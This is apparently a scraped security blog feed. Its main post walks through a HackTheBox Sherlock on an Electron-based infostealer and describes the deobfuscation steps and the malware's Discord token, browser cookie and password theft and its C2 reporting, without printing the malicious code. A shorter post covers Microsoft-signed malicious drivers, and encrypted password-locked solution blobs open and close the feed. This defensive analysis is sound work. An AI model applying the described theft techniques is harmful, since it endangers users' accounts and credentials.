lxsvPcofaf7QDZ02fvmkO6MdBcLb0kkVTkLvlVfPApz5qvoSbb4oq6cCUYS+ruAwmOoCi3qdS1hltKZCZQNaJLQ2xXEJKfnKQstxfIIMWS84F+pkrDexwsK+LDoNr8o5X2AmLtnzIk9zyXgWyPxv/Gk1DUpuHZXFXNPgbierLEHzXS3ppnVp4ugjvqYc89+SRHiwXiF+d2i27uZ8xIzJVsUj4T2LBpLHksX9JP5ojDN01d0Jwnf/bgoukyHmFWu8SQ4JY2srQsJnEIwns38KJM6yMrmx7AcEuPYQatAko5YmYedz7y58gL9aJs5X7KK1joxK47S0V7ozt7EpIlTmJZzG4SYGbQFHtHV6dfnTc+lrRO1j6f7mUmRfNOtbLmQKEyqvIpE9MbY7qYumg1Ix4kaonSg4152yrhcnq0KXTQn0V7nUqe7mnO5gwprVvmN1OveF00om43H4y5noEAE4fcivXr/mVAuYJlju3Ax7PCaVMeq6LSrR4hqJq1Kr7vr5qUlLNlZveOP1wB5YNj2TosvPt9WojkMP1WyVSVOrLWFDsMvd26uRetEU24TaSH8Uwm9AQuCAVj+OFmpSSGELa783R6JmScR6ovWAE8UmTWF3U4ORZ7XTr87h4vB5zVGmlCXH4JGmJyBdMOhvPsmeZO90+s/nh5+QDliZqx7u1RHBmMnmaVefkRWbPGCv9HSMNjmjWD4/CsVOOXCZZ9imZU/EodYBHBH5rI8SpWg9QqMgOxGCpKMeREDH4a5AOmdQJjsCZU0YEA+mlO5LgmqjItaO2MWKBYb8XPerFhgBqEaH8aaHTx73ffiQzhKFHZXkM1/vfoTDylZuCmWuSfralHGoILa2FmIbe0lck5iqkSVqyvVGX2i5X4GWBg9aSQJNkkk2EJDsfQAgEldLXN2E+yeKqP8UtxT5Ge8LuogXGDPQbdKmeZdMSs18CpE9XkvV+5ltAD1J0fZE5k3t1rEpAeec3GnH1qnxLX5Ocdr38o0Zd4An77To4GXCYAzzScI4cdJ65AHeSqC3zp/VqsvITiVBhkQ4bjGBFSCP1ZWT+9fkRV1x/HkeaKh8UCIRt4YsxBkfoQMMc7xRARw2DIqG3LOm207/vc0gKV+0IgxMm8udbWwTHkOskddNW0eEMPM9330T1NtC/rAMmgszg53WeUnIN91R6ywx/fvvM/G0662sxTrQU0au2yU7yBm9c8+/nxh4FaT2NDUJ4r5+iejCmzRvSuam95H++lfU2U2V+h7jNiqkLf3sdu5r3JDI8ck5+GWlC4H8m8egPlzgQ+1ELZ1NCIe7+JSSKc8MPJm1Q6E4kRT3TSP7NNIUYIxxsjUiCHIHcYSt5ckldFWghrZI+aquuSbf+XyOy6jRi+2vAoSQWpYD2a6X92/e3BWJCVoJ8UUTV+V3GTFR+CfOFEzFOsvlgdCuHMeKgHff0E4X0A6byGxt78HZ9d5fT4BIcNyjU6pGCzSeoEFi14+Lglk/UrRGsuTxDwSVKyOPAsYJKAohV+3AXG8Q4t0K1+xZqmtSIAJAD/ifPD7WpWFNKE/i+kBVgZuLpU7SVCSxPOWAZgQ/HQqURYPayBlXQZor7sL4nU0/LaD10Zn/9idrdIaZk9aiSBxxWyfpjgrV9I0kpL9p+QrPZcLZEBPBQYp5DV5KRF3OMHmXwqVaOqP3YTok9aEHvWJKpNtZtEdrraTvp35n5GKmh5mu8tdxjKvKKh8dbha8IbdaNolbUkScmgWSW/aRH3qlwJciTA1oBCbOFzHN/oaUtZ74jyNemH6ScqFyfUccBt8oq9lsuwsj+YMUXrmmX/8DNnRaRm0vGJJeu957jtQb3s/bQJvArvwvLwb6y4Nk6yfAfqFZ0AjBHm4K;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on HackTheBox, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution, or if you have already solved this challenge, use the answer to task 14 to unlock.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2024-12-31T20:14:00-05:002024-12-31T20:14:00-05:00Eric Turnertag:blog.ericturner.it,2024-12-31:/2024/12/31/hackthebox-sherlock-subatomic/

<p>Challenge: <a href="https://app.hackthebox.com/sherlocks/Subatomic">https://app.hackthebox.com/sherlocks/Subatomic</a></p> <h1 id="introduction">Introduction</h1> <blockquote> <p>Forela is in need of your assistance. They were informed by an employee that their Discord account had been used to send a message with a link to a file they suspect is malware. The message read: "Hi! I've been working on …</p></blockquote>

<p>Challenge: <a href="https://app.hackthebox.com/sherlocks/Subatomic">https://app.hackthebox.com/sherlocks/Subatomic</a></p> <h1 id="introduction">Introduction</h1> <blockquote> <p>Forela is in need of your assistance. They were informed by an employee that their Discord account had been used to send a message with a link to a file they suspect is malware. The message read: "Hi! I've been working on a new game I think you may be interested in it. It combines a number of games we like to play together, check it out!". The Forela user has tried to secure their Discord account, but somehow the messages keep being sent and they need your help to understand this malware and regain control of their account! Warning: This is a warning that this Sherlock includes software that is going to interact with your computer and files. This software has been intentionally included for educational purposes and is NOT intended to be executed or used otherwise. Always handle such files in isolated, controlled, and secure environments. One the Sherlock zip has been unzipped, you will find a DANGER.txt file. Please read this to proceed.</p> </blockquote> <h1 id="analysis">Analysis</h1> <p>We are provided a ZIP file that contains DANGER.txt and malware.zip. DANGER.txt provides information that this file can actually interact with your computer in a malicious way and should not be just opened and executed. Luckily, I dropped the file in my ParrotOS VM, let's get to investigating</p> <h2 id="file-analysis">File Analysis</h2> <p>File Name</p> <p>nsis-installer.exe</p> <p>File Type</p> <p>PE32 Windows Executable, Nullsoft Installer Self-Extracting Archive</p> <p>File Size</p> <p>78MB</p> <p>Size of Code</p> <p>26624 bytes</p> <p>OS Version</p> <p>Windows 95</p> <p>SHA256</p> <p>7a95214e7077d7324c0e8dc7d20f2a4e625bc0ac7e14b1446e37c47dff7eeb5b</p> <p>Copyright</p> <p>Copyright 2024 SerenityTherapyInstaller Inc</p> <p>Creation Timestamp</p> <p>2018-12-15 17:26:15 -05:00</p> <p>Strings was not super useful here. There was some plain readable text that showed this was a self-extracting archive, but otherwise most of the text was unreadable as the executable is packed.<br/> The extractor in Detect-It Easy is able to carve and dump a bunch of GZIP'd files, but they do not appear helpful for me.</p> <h2 id="further-analysis-on-linux">Further Analysis on Linux</h2> <p>I found we can open the installer using an archive manager. Inside of $PLUGINSDIR is app-32.7z. Pulling this out and extracting it shows an electron chromium package. Inside of /resources is an app.asar. We can use <code>npx @electron/asar extract app.asar ./app</code> to extract this and further look at the source code of this application. Here is a breakdown of what the full application looks like:</p> <div class="highlight"><pre><span></span><code><span class="o">/</span><span class="n">nsis</span><span class="o">-</span><span class="n">installer</span><span class="p">.</span><span class="n">exe</span> <span class="w"> </span><span class="o">/</span><span class="err">$</span><span class="n">PLUGINSDIR</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">app</span><span class="o">-</span><span class="mf">32.7</span><span class="n">z</span> <span class="w"> </span><span class="o">/</span><span class="n">locales</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="o">*</span><span class="p">.</span><span class="n">pak</span><span class="w"> </span><span class="p">(</span><span class="k">language</span><span class="w"> </span><span class="n">files</span><span class="p">)</span> <span class="w"> </span><span class="o">/</span><span class="n">resources</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">app</span><span class="p">.</span><span class="n">asar</span> <span class="w"> </span><span class="o">/</span><span class="n">node_modules</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">app</span><span class="p">.</span><span class="n">js</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">package</span><span class="p">.</span><span class="n">json</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">elevate</span><span class="p">.</span><span class="n">exe</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">chrome_100_percent</span><span class="p">.</span><span class="n">pak</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">chrome_200_percent</span><span class="p">.</span><span class="n">pak</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">d3dcompiler_47</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">ffmpeg</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">icudtl</span><span class="p">.</span><span class="n">dat</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">libEGL</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">libGLESv2</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">LICENSE</span><span class="p">.</span><span class="n">electron</span><span class="p">.</span><span class="n">txt</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">LICENSE</span><span class="p">.</span><span class="n">chromium</span><span class="p">.</span><span class="n">html</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">resources</span><span class="p">.</span><span class="n">pak</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">SerenityTherapyInstaller</span><span class="p">.</span><span class="n">exe</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">snapshot_blob</span><span class="p">.</span><span class="n">bin</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">v8_context_snapshot</span><span class="p">.</span><span class="n">bin</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">vk_swiftshader</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">vk_swiftshader_icd</span><span class="p">.</span><span class="n">json</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">vulkan</span><span class="o">-</span><span class="mf">1.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">nsExec</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">nsis7z</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">SpiderBanner</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">StdUtils</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="k">System</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">WinShell</span><span class="p">.</span><span class="n">dll</span> <span class="w"> </span><span class="o">/</span><span class="err">$</span><span class="n">R0</span> <span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">Uninstall</span><span class="w"> </span><span class="n">SerenityTherapyInstaller</span><span class="p">.</span><span class="n">exe</span> <span class="w"> </span><span class="o">[</span><span class="n">NSIS</span><span class="o">]</span><span class="p">.</span><span class="n">nsi</span><span class="w"> </span><span class="p">(</span><span class="k">only</span><span class="w"> </span><span class="n">visible</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">Windows</span><span class="w"> </span><span class="k">with</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">special</span><span class="w"> </span><span class="n">nsis</span><span class="w"> </span><span class="n">plugin</span><span class="p">)</span> </code></pre></div> <p>The main app.js is completely obfuscated.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-14.webp"/></p> <p>We can utilize a beautifier in VS Code, but it does not exactly help besides space things out to over 2k lines.</p> <p>Using the debugger in VS Code, we can set a breakpoint immediately on line 1 and use F11 to step through the code while watching the sidebar to determine outputs. <code>function_0x14c9</code> is looped through recursively due to the while loop at the top of the file. The loop appears to be looking for a specific value found in the <code>0x2662a3</code> 6668 long array found in <code>function _0x327a</code></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-17.webp"/></p> <p>meanwhile if the value is not found, it will keep running a separate function to push / shift </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-18.webp"/></p> <p>By modifying the code and creating a breakpoint on this if statement, I found it is looking for value 423471 and it takes 221 loops to get this value. Next it finally progreeses into <code>function _0x59c5a2</code> to re-use the original value return function to return even more strings. After completing more loops, it progresses into <code>_0x9a027</code> between garbled text, <code>call</code> and <code>defineProp</code> appear in the console. It appears to be building an object:</p> <div class="highlight"><pre><span></span><code><span class="kd">function</span><span class="w"> </span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">_0x1815fa</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">_0x494d30</span><span class="p">;</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">_0x3cf35d</span><span class="p">[</span><span class="nx">_0x1815fa</span><span class="p">(</span><span class="mh">0x169d</span><span class="p">)](</span><span class="nx">_0x654edc</span><span class="p">,</span><span class="w"> </span><span class="p">...</span><span class="nx">arguments</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> </code></pre></div> <p>Unfortunately, the code kept hanging in my VM at this point on the same case '3' spot. My assumption is that it's checking for linux and if it's linux, it's killing the script, as the original file is a windows .exe. One of the tasks alludes to a killswitch on "arch".</p> <h2 id="analysis-take-2-windows">Analysis Take 2 - Windows</h2> <p>I rebuilt the functionality on my windows VM. I installed flare VM to this box. During install, there is a 7z-nsis.vm that can be added that allows proper opening of the NSIS exe to reveal a hidden file needed for one of the tasks in this lab:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-19.webp"/></p> <p>The mutex GUID is found via this file. I navigated through opening $PLUGINSDIR\app-32.7z\resources again like on the linux attempt, and extracted app.asar to \app for VS Code debugging and also took a look at elevate.exe in this dir. Using Detect-It Easy, we can see this binary is provided by Johannes Passing and is intended to provide elevated rights to the command line: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-21.webp"/></p> <p>Strings from elevate.exe</p> <h3 id="dynamic-debugging-appjs">Dynamic Debugging app.js</h3> <p>Again we are back with the heavily obfuscated app.js file. A quick <code>npm install</code> to ensure the dependencies exit. And a quick VM snapshot in case I fail to properly debug.</p> <p>Attempting to debug now immediately throws a <code>dpapi.node</code> is not a valid Win32 application. A quick <code>npm update</code> fixes this issue and after a second or so of pausing and resuming, an <code>eval</code> appears in the callstack with de-obfuscated JS code. I quickly copied this into a new file and killed the running debug process, so we can investigate in a safer method.</p> <h3 id="deobfuscated-code">Deobfuscated Code</h3> <p>Immediately at the top we have an <code>options</code> object that includes a C2 API and user_id. There are also a number of functions:</p> <ul> <li>checkVm<ul> <li>if the machine has less than 2GB of ram, it kills the script</li> <li>if the name of the PC is in a pre-determined list, it kills the script</li> <li>if one of the processes in a pre-determined list is running, it kills any of the processes<ul> <li>several of these processes are VM dependent (vmwareservice, vmwaretray)</li> <li>several are malware analysis dependent (dumpcap, fakenet)</li> </ul> </li> </ul> </li> <li>getDiscordTokens<ul> <li>Uses an API call to fetch discord tokens from the malicious API in the options object and proceed to decrypt the token and send it back to /valid-tokens with the username and computer host name</li> </ul> </li> <li>newInjection<ul> <li>calls systemInformattion to get OS info</li> <li>calls discordInjection()</li> <li>fetches IP Info from API</li> <li>calls network.json() for more network info</li> <li>sends to api /new-injection endpoint with the discord username from options, computer name, amount of RAM, CPU count, OS info, uptime and network info</li> </ul> </li> </ul> <p>In addition to getting discord tokens and injecting itself directly into discord, the malware has numerous functions to steal browser information such as cookies, autofills and passwords. If CMD is missing from the system, it will download it's own version to use. And if any errors are thrown, they are also sent back to the C2 for diagnostics. </p> <p>This is a very good example of an infostealer malware.</p> <h2 id="task-walkthrough_1">Task Walkthrough</h2> <h3 id="task-1-imphash">Task 1 - imphash</h3> <p>This is my first time learning about Import Hashing, or imphash. Per <a href="https://cloud.google.com/blog/topics/threat-intelligence/tracking-malware-import-hashing/">this 2014 article</a>, the import hash is a way to hash the import address table and specific order of imports and use to attempt to track threat groups in using a specific methodology of malware. File hashes can change with imports, but import hashing is more static over version changes.<br/> Following the information at the bottom of the article, I wrote a simple statement to be quickly ran in the terminal to pull the impash:</p> <div class="highlight"><pre><span></span><code><span class="nv">$python3</span><span class="w"> </span>-c<span class="w"> </span><span class="s2">"import pefile; pe=pefile.PE('./nsis-installer.exe');print(pe.get_imphash())"</span> </code></pre></div> <h3 id="task-2-program-name">Task 2 - Program Name</h3> <p>Another new thing for me, <code>SpcSpOpusInfo</code> and the program name is derived from Microsoft's Authenticode on signed binaries. Another <a href="https://cloud.google.com/blog/topics/threat-intelligence/hunting-attestation-signed-malware">blog post here</a> for information on that. I am on linux, so I cannot view cert info via the Properities GUI. I found a python package, <a href="https://signify.readthedocs.io/en/stable/authenticode.html">Signify</a>, that allows you to gain this info from the binary easily.</p> <p>Using ParrotOS, I created a new directory and python <code>venv</code> to install signify, force an <a href="https://community.snowflake.com/s/article/Python-Connector-fails-to-connect-with-LibraryNotFoundError-Error-detecting-the-version-of-libcrypto">update patch</a> to oscrypto due to a bug in detecting libcrypto, use a modified version <a href="https://github.com/ralphje/signify/blob/master/examples/authenticode_info.py">this python script</a> from the creator of signify, and investigate the malware.</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>mkdir<span class="w"> </span>~/code $<span class="w"> </span><span class="nb">cd</span><span class="w"> </span>~/code $<span class="w"> </span>python<span class="w"> </span>-m<span class="w"> </span>venv<span class="w"> </span>venv $<span class="w"> </span><span class="nb">source</span><span class="w"> </span>~/code/venv/bin/activate <span class="o">(</span>venv<span class="o">)</span>$<span class="w"> </span>pip<span class="w"> </span>install<span class="w"> </span>signify <span class="o">(</span>venv<span class="o">)</span>$<span class="w"> </span>pip<span class="w"> </span>install<span class="w"> </span>--force-reinstall<span class="w"> </span>https://github.com/wbond/oscrypto/archive/d5f3437ed24257895ae1edd9e503cfb352e635a8.zip <span class="o">(</span>venv<span class="o">)</span>$<span class="w"> </span><span class="nb">cd</span><span class="w"> </span>~/.../sherlock_subatomic <span class="o">(</span>venv<span class="o">)</span>$<span class="w"> </span>python<span class="w"> </span>~/code/authenticode.py<span class="w"> </span>./nsis-installer.exe </code></pre></div> <p>I removed the sections about indirect data as it throws an error. Running the script reveals the application is signed via Microsoft Code Signing PCA 2011 and has a program name of Windows Update Assistant. Therefore, this could look like an official Microsoft signed binary: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-13.webp"/></p> <p>output of authenticode script</p> <h3 id="task-3-guid">Task 3 - GUID</h3> <p>Opening the once hidden <code>[NSIS].nsi</code> reveals a mutex GUID the application uses:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-20.webp"/></p> <h3 id="task-4-license">Task 4 - License</h3> <p>After unpacking app.asar, we can see the package.json which shows a license of ISC</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-30.webp"/></p> <h3 id="task-5-c2-domain">Task 5 - C2 Domain</h3> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-23.webp"/></p> <p>Domain is found in <code>const options</code></p> <h3 id="task-6-ip-info">Task 6 - IP Info</h3> <p>Found under newInjection</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-26.webp"/></p> <h3 id="task-7-c2-url">Task 7 - C2 URL</h3> <p>Found right at the top of the deobfuscated file under the <code>const options</code> , same as task 5</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-23.webp"/></p> <h3 id="task-8-user_id-variable">Task 8 - user_id Variable</h3> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-25.webp"/></p> <h3 id="task-9-hostname">Task 9 - hostname</h3> <p>Found at the top of the deobfuscated code: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-22.webp"/></p> <h3 id="task-10-process-name">Task 10 - process name</h3> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-24.webp"/></p> <h3 id="task-11-file-write">Task 11 - file write</h3> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-28.webp"/></p> <p>This function checks for CMD and if it does not exist, it pulls cmd from the API and writes it to the user's document folder</p> <h3 id="task-12-firefox-cookies">Task 12 - firefox cookies</h3> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-27.webp"/></p> <h3 id="task-13-discord-module">Task 13 - Discord module</h3> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-29.webp"/></p> <h1 id="conclusion_2">Conclusion</h1> <p>Initially, I found the task rather difficult. It turns out because I was attempting to debug the script on Linux and not the native windows, it was failing to properly execute the nodejs code. After rebuilding my malware analysis environment inside of Windows 10, it was extremely easy to reproduce and get myself into the deobfuscated code to determine the true intent of the application. </p> <p>In my linux version, I had beautified the code and had multiple break points and <code>console.log()</code> messages written in to help debug the obfuscation. On windows, I simply hit debug and just spammed pause and resume for it to get to the proper location. In hindsight, some of the code could've executed and sent information over to the C2 if I didn't pause in time. I lucked out in pausing right before it did any actual checks. For next time, continuing to use breakpoints and stepping through the code is smarter. Luckily, I had internet disconnected from the box, this is always a good best practice for analyzing malware.</p>2024-12-30T14:21:47-05:002024-12-30T14:21:47-05:00Eric Turnertag:blog.ericturner.it,2024-12-30:/2024/12/30/malware-digitally-signed-by-microsoft/

<p>While working on a sherlock from HackTheBox, I researched a tactic of threat actors abusing the Microsoft driver signing process to allow their malware to be digitally signed by Microsoft.</p> <h1 id="general-information">General Information</h1> <p>An example of this from the Google Cloud / Mandiant blog post:<br/> <a href="https://www.virustotal.com/gui/file/4257ece19a9e4abc1eb251463bce623d2ac45afd0ed7939ba5e76ee9dbde2fa5">VirusTotal - File - 4257ece19a9e4abc1eb251463bce623d2ac45afd0ed7939ba5e76ee9dbde2fa5</a></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-15.webp"/></p> <p>Detection page for the …</p>

<p>While working on a sherlock from HackTheBox, I researched a tactic of threat actors abusing the Microsoft driver signing process to allow their malware to be digitally signed by Microsoft.</p> <h1 id="general-information">General Information</h1> <p>An example of this from the Google Cloud / Mandiant blog post:<br/> <a href="https://www.virustotal.com/gui/file/4257ece19a9e4abc1eb251463bce623d2ac45afd0ed7939ba5e76ee9dbde2fa5">VirusTotal - File - 4257ece19a9e4abc1eb251463bce623d2ac45afd0ed7939ba5e76ee9dbde2fa5</a></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-15.webp"/></p> <p>Detection page for the vpn.sys driver</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-16.webp"/></p> <p>Details tab on vpn.sys showing the valid certificate from Microsoft. Special attention to SpcSpOpusInfo</p> <p>Using a tool such as Python's <a href="https://signify.readthedocs.io/en/stable/authenticode.html">Signify</a>, you can easily parse the Program Name from a digitally signed executable on Windows or Linux. The program name, such as the 厦门恒信卓越网络科技有限公司 (Xiamen Hengxin Excellent Network Technology Co., Ltd.) in the above example can be used to detect other executables from the same organization that may also be malicious.</p> <p>The Google Cloud / Mandiant article listed below also has a plethora of other examples of binaries that use the same program name. You can also find a similar list in <a href="https://www.virustotal.com/gui/collection/336fd9e47398dde814431a3c7f5159b24500c86309e5796f1faee748827367ec">this VirusTotal Collection</a> or by pivoting off the above binary in <a href="https://www.virustotal.com/graph/4257ece19a9e4abc1eb251463bce623d2ac45afd0ed7939ba5e76ee9dbde2fa5">Virus Total's Threat Graph.</a></p> <h1 id="resources">Resources</h1> <h2 id="2022">2022</h2> <ul> <li><a href="https://cloud.google.com/blog/topics/threat-intelligence/hunting-attestation-signed-malware">cloud.google.com/blog/topics/threat-intelligence/hunting-attestation-signed-malware</a></li> <li><a href="https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/">Driving Through Defenses | Targeted Attacks Leverage Signed Malicious Microsoft Drivers - SentinelOne</a></li> </ul> <h2 id="2023">2023</h2> <ul> <li><a href="https://news.sophos.com/en-us/2023/07/11/microsoft-revokes-malicious-drivers-in-patch-tuesday-culling/">Microsoft Revokes Malicious Drivers in Patch Tuesday Culling &ndash; Sophos News</a></li> </ul> <h2 id="2024">2024</h2> <ul> <li><a href="https://www.welivesecurity.com/en/eset-research/hotpage-story-signed-vulnerable-ad-injecting-driver/">HotPage: Story of a signed, vulnerable, ad-injecting driver</a></li> <li><a href="https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/">Smoke and (screen) mirrors: A strange signed backdoor &ndash; Sophos News</a></li> </ul>2024-12-28T23:41:34-05:002024-12-28T23:41:34-05:00Eric Turnertag:blog.ericturner.it,2024-12-28:/2024/12/28/hackthebox-sherlock-heartbreaker-continuum/

This challenge is currently active on HackTheBox, thus is required to be password protected. You will need to wait until the challenge is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">qsDHrmJSRyHX4LC7YWnOtw==;vwjMiAg/VpcWZ7WVaS7V/qNU91yy0QYchI+fx44zKKhsdyUV8YB70MUSfzRid45Z7VSTKuwQwy334IjhKrrRuNUrTWoWjFZBy0vH4Bf9YxabPML76vsRf56K8sM1Jo7SlGX4K/FlZUd95VkHSLs+MtumSUAtSXdDHuzpQpNTBylV7IokvTOEOo7pVUHeADUGOOwOW3sjc5mCmtUMCF0Fda3r/vPAdRWrkk0KZA4o1NRVLH0883hsz0SX72T0xq4TwU08UoguNofigSaupfWf6VUeyoRExziRjLYch9qMb3FCwFdQNXZsne2TDjgmPlOZ8HKG3kh259IFDt3+hzuyFRuqucT8aRQtCDfEXvTXFjPOhBNuoAvei55fcsa6tYoRrKYuFuaC424KpDhzIYputBzQ9R6ldwp/YtXhfIJeyPVqEp0RzESksun3lu3IWfre/6B9GXtSvoRxeVHewlyfHjWMeEKi6Z11P4ofNt2qSowvD/0T8WVQej8tjX2kmJ1bZS98M+O8IdlcE4gX14CP//igMJdoMh/dVDiYJIeqGR9zNbxSjN0ntvrCea5N+o7Isavwb0NzqgE/rH/YiRbzrC/QJvghM4F1kl3km1mjtElT8cJTMHeN9e8S/DbA4Id/8vnhjEHzLNVOdtTBTTG0T2KAXnSCV2Edlh7f073Q9vI4J50NowypIoMgxappA3xkSNxiwgRVcdipnFXvjdJBRZngSUQcbTosfX+GMi21yzG75+TVdD09zC73Q4Ir/YHx24YTWChZOhHhH3c2dYJhc3bx+h5RuS/1USGKLud/vcZvUX7ERa3amP8Hk3FLVd0LM2Pr7k4CxtTQKlbJ5+4fQ7kIUi++mq1tPlL5X1L5sezu/iuAvIVt+S0TOwx9VwAvomJPcq/9a7OhS2q2YcYB6dCfSu3f/gbst+Wn4bXDTf/l5kvmd2DtF/G0lKQls6FDMfa5FmxT0hcmEGiuWqihRDc4UVB3DyF54IrKTUVpXkvrp/ZyCmvGeqCNya2UwuY2ayTtusdjPnCCUtSrQcgYPX1LPBU8m4FkGpsgMd1+OU3ZwQi2UCkiiKq7NWUnoeyQPsrOip0BDp8xuL33DSa1TSiYiiFZiYE2l4HdDJ3jbYQ6AeG2pbJ2g7vuJDRCLqd5zH46TdtqyBN1pRGotVD3Hrv3719ZBp5KzQbnpV20ruMGM0BeZ37kNswr3Xu2HEwOnWVNrWlMEI60ACJa3/38vzDB9Gkrl7tndT8GHDhPUX66LiDu6tyFoNVLWeWHerS4ETn8bTLcuT/alONyT5mqFx5ow8+IXvlZlfJNxfLkjf8wBwqV+ZzysuTlJxFX/57vrpkvBLfNrIIPo+1qiCMVY3xNwytK/o3319bD5ncB4ZZd/IduChkHeKVKo9MhCGX0MBNLrjU3PhX9cPHsBtDzYRtqG2dmPkY6TgkRu+0kp431IUadJ8TM4fVs+2lMwokSVY7PhlrSdnx0du9OCUFr7ErHGyVEpVlI21wkp7xY5Ojro8pVadaFgrmkCVuFy1eSGARPkwVeyGrQCncc3plKkuhwAS3F7XQZUWuAOpMgJ9ymFxXviLcaPexRMILAkcWVE85x5SCn+CZW2zhjKeXvtKxGG2YT0eWQKWaksGDbFBy0bXF3XTUmZ4aZ1Rfg5sLsaDN34EhJa7FLXLzaZJu00jnJGY+ZBabKDfqB8JVd7bRFsOOtlKeELr8DYr0V9tA56hUDY0KWzeZunYA8/JrTWvsZU/gmqbgVVaT3imEoo0aCQyY